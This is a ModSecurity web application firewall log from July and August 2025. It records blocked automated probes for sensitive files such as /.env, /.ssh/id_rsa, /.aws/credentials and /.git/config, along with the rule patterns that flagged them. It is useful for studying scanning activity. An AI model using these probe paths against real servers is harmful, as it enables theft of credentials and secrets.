[Thu Jul 31 09:07:29.174987 2025] [:error] [pid 1590722] [client 213.232.87.234:11727] [client 213.232.87.234] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aIsWMWiVPVgtcxTHeBh0IwAAAAI"]
[Thu Jul 31 09:07:29.175134 2025] [:error] [pid 1590722] [client 213.232.87.234:11727] [client 213.232.87.234] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aIsWMWiVPVgtcxTHeBh0IwAAAAI"]
[Thu Jul 31 09:07:29.175340 2025] [:error] [pid 1590722] [client 213.232.87.234:11727] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aIsWMWiVPVgtcxTHeBh0IwAAAAI"]
[Thu Jul 31 09:07:29.175496 2025] [:error] [pid 1590722] [client 213.232.87.234:11727] [client 213.232.87.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aIsWMWiVPVgtcxTHeBh0IwAAAAI"]
[Thu Jul 31 09:07:29.202330 2025] [:error] [pid 1592562] [client 213.232.87.234:23363] [client 213.232.87.234] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "aIsWMVOl0wEe6bL3wL9JDgAAAAs"]
[Thu Jul 31 09:07:29.202573 2025] [:error] [pid 1592562] [client 213.232.87.234:23363] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "aIsWMVOl0wEe6bL3wL9JDgAAAAs"]
[Thu Jul 31 09:07:29.202743 2025] [:error] [pid 1592562] [client 213.232.87.234:23363] [client 213.232.87.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "aIsWMVOl0wEe6bL3wL9JDgAAAAs"]
[Thu Jul 31 09:07:29.266863 2025] [:error] [pid 1590754] [client 213.232.87.234:20879] [client 213.232.87.234] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aIsWMSiYD7R6T6im77vdUwAAAAU"]
[Thu Jul 31 09:07:29.267063 2025] [:error] [pid 1590754] [client 213.232.87.234:20879] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aIsWMSiYD7R6T6im77vdUwAAAAU"]
[Thu Jul 31 09:07:29.267221 2025] [:error] [pid 1590754] [client 213.232.87.234:20879] [client 213.232.87.234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aIsWMSiYD7R6T6im77vdUwAAAAU"]
[Thu Jul 31 11:38:33.498100 2025] [:error] [pid 1596361] [client 20.74.85.78:58032] [client 20.74.85.78] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIs5mYHND5NS942tdCx61wAAAAo"]
[Thu Jul 31 11:38:33.498504 2025] [:error] [pid 1596361] [client 20.74.85.78:58032] [client 20.74.85.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIs5mYHND5NS942tdCx61wAAAAo"]
[Thu Jul 31 11:38:33.498678 2025] [:error] [pid 1596361] [client 20.74.85.78:58032] [client 20.74.85.78] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIs5mYHND5NS942tdCx61wAAAAo"]
[Fri Aug 01 07:28:34.478864 2025] [:error] [pid 1615761] [client 196.251.81.14:45364] [client 196.251.81.14] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIxQgurvdTVqnAZ_mAiyaQAAAAU"]
[Fri Aug 01 07:28:34.479138 2025] [:error] [pid 1615761] [client 196.251.81.14:45364] [client 196.251.81.14] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIxQgurvdTVqnAZ_mAiyaQAAAAU"]
[Fri Aug 01 07:28:34.479309 2025] [:error] [pid 1615761] [client 196.251.81.14:45364] [client 196.251.81.14] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIxQgurvdTVqnAZ_mAiyaQAAAAU"]
[Fri Aug 01 08:47:30.580805 2025] [:error] [pid 1615761] [client 93.123.109.7:55694] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIxjAurvdTVqnAZ_mAiybAAAAAU"]
[Fri Aug 01 08:47:30.581229 2025] [:error] [pid 1615761] [client 93.123.109.7:55694] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIxjAurvdTVqnAZ_mAiybAAAAAU"]
[Fri Aug 01 08:47:30.581421 2025] [:error] [pid 1615761] [client 93.123.109.7:55694] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIxjAurvdTVqnAZ_mAiybAAAAAU"]
[Sat Aug 02 20:37:24.161506 2025] [:error] [pid 1640658] [client 196.251.81.14:43844] [client 196.251.81.14] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aI5a5G1ARV2P34JYtMyk6wAAAAM"]
[Sat Aug 02 20:37:24.162544 2025] [:error] [pid 1640658] [client 196.251.81.14:43844] [client 196.251.81.14] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aI5a5G1ARV2P34JYtMyk6wAAAAM"]
[Sat Aug 02 20:37:24.165371 2025] [:error] [pid 1640658] [client 196.251.81.14:43844] [client 196.251.81.14] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aI5a5G1ARV2P34JYtMyk6wAAAAM"]
[Sun Aug 03 02:38:43.942402 2025] [:error] [pid 1662921] [client 134.122.29.82:60596] [client 134.122.29.82] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aI6vkx7rw4WPH4unUZZumQAAAAY"]
[Sun Aug 03 02:38:43.942688 2025] [:error] [pid 1662921] [client 134.122.29.82:60596] [client 134.122.29.82] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aI6vkx7rw4WPH4unUZZumQAAAAY"]
[Sun Aug 03 02:38:43.942865 2025] [:error] [pid 1662921] [client 134.122.29.82:60596] [client 134.122.29.82] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aI6vkx7rw4WPH4unUZZumQAAAAY"]
[Sun Aug 03 06:28:28.438725 2025] [:error] [pid 1665483] [client 3.138.185.30:44815] [client 3.138.185.30] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aI7lbFKHZG_Rt4xi6vyLvQAAAAM"]
[Sun Aug 03 06:28:28.439151 2025] [:error] [pid 1665483] [client 3.138.185.30:44815] [client 3.138.185.30] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aI7lbFKHZG_Rt4xi6vyLvQAAAAM"]
[Sun Aug 03 06:28:28.439353 2025] [:error] [pid 1665483] [client 3.138.185.30:44815] [client 3.138.185.30] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aI7lbFKHZG_Rt4xi6vyLvQAAAAM"]
[Mon Aug 04 15:56:18.247813 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJC8Ajd0OZGgr9fy1N49DAAAAAg"]
[Mon Aug 04 15:56:18.249300 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJC8Ajd0OZGgr9fy1N49DAAAAAg"]
[Mon Aug 04 15:56:18.249480 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJC8Ajd0OZGgr9fy1N49DAAAAAg"]
[Mon Aug 04 15:56:18.271637 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJC8Ajd0OZGgr9fy1N49DQAAAAg"]
[Mon Aug 04 15:56:18.271866 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJC8Ajd0OZGgr9fy1N49DQAAAAg"]
[Mon Aug 04 15:56:18.272029 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJC8Ajd0OZGgr9fy1N49DQAAAAg"]
[Mon Aug 04 15:56:18.294125 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aJC8Ajd0OZGgr9fy1N49DgAAAAg"]
[Mon Aug 04 15:56:18.294378 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aJC8Ajd0OZGgr9fy1N49DgAAAAg"]
[Mon Aug 04 15:56:18.294544 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aJC8Ajd0OZGgr9fy1N49DgAAAAg"]
[Mon Aug 04 15:56:18.317081 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aJC8Ajd0OZGgr9fy1N49DwAAAAg"]
[Mon Aug 04 15:56:18.317353 2025] [:error] [pid 1699197] [client 185.177.72.106:30714] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aJC8Ajd0OZGgr9fy1N49DwAAAAg"]
